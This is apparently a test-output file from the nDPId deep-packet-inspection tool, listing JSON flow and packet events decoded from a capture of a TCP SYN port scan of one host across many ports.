-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsg4YAACoGmuysEAAIQA2GNIzSCDrdUoMYAAAAAGACDAAkVQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs28kAACgGRKmsEAAIQA2GNIzS8FzdUoMYAAAAAGACBABEMgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsTfIAADkGwYCsEAAIQA2GNIzSAfHdUoMYAAAAAGACCAAungAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs93kAACUGK\/msEAAIQA2GNIzSCzXdUoMYAAAAAGACCAAlWgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsrdMAACcGc5+sEAAIQA2GNIzSGg3dUoMYAAAAAGACEAAOggAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZcAADMGp9usEAAIQA2GNIzSBZndUoMYAAAAAGACEAAi9gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsF0kAACUGDCqsEAAIQA2GNIzSD6DdUoMYAAAAAGACCAAg7wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsM9YAADEG45ysEAAIQA2GNIzSBBPdUoMYAAAAAGACCAAsfAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsUkAAADMGwzKsEAAIQA2GNIzSJWfdUoMYAAAAAGACEAADKAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsUOAAAC8GyJKsEAAIQA2GNIzSgADdUoMYAAAAAGACEACojgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsD6cAADIGBsysEAAIQA2GNIzSBmndUoMYAAAAAGACDAAmJgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsxQcAADIGUWusEAAIQA2GNIzSFsHdUoMYAAAAAGACDAAVzgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsiBIAADgGiGCsEAAIQA2GNIzSJqrdUoMYAAAAAGACBAAN5QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsY2AAADUGsBKsEAAIQA2GNIzSatvdUoMYAAAAAGACCADFswAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAss00AACYGbyWsEAAIQA2GNIzSBi\/dUoMYAAAAAGACDAAmYAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBUAADsG2V2sEAAIQA2GNIzSGbTdUoMYAAAAAGACEAAO2wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsz7wAACUGU7asEAAIQA2GNIzSC7ndUoMYAAAAAGACCAAk1gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058281,"pkt":"ACYLMQczACWzv5HuCABFAAAsAdoAACsGG5msEAAIQA2GNIzSCI7dUoMYAAAAAGACEAAgAQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058281,"pkt":"ACYLMQczACWzv5HuCABFAAAs2W4AACcGSASsEAAIQA2GNIzSwAPdUoMYAAAAAGACEABoiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs3SEAACsGQFGsEAAIQA2GNIzTCzXdU4MZAAAAAGACEAAdVwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsJv0AADkG6HWsEAAIQA2GNIzTAfHdU4MZAAAAAGACCAAumwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsXWIAADEGuhCsEAAIQA2GNIzT8FzdU4MZAAAAAGACCABALwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsw9gAACsGWZqsEAAIQA2GNIzTCDrdU4MZAAAAAGACEAAgUgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs6AwAADoGJmasEAAIQA2GNIzTBDHdU4MZAAAAAGACDAAoWwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs5F4AACoGOhSsEAAIQA2GNIzTNJDdU4MZAAAAAGACDAD3+wAAAgQFtA=="} 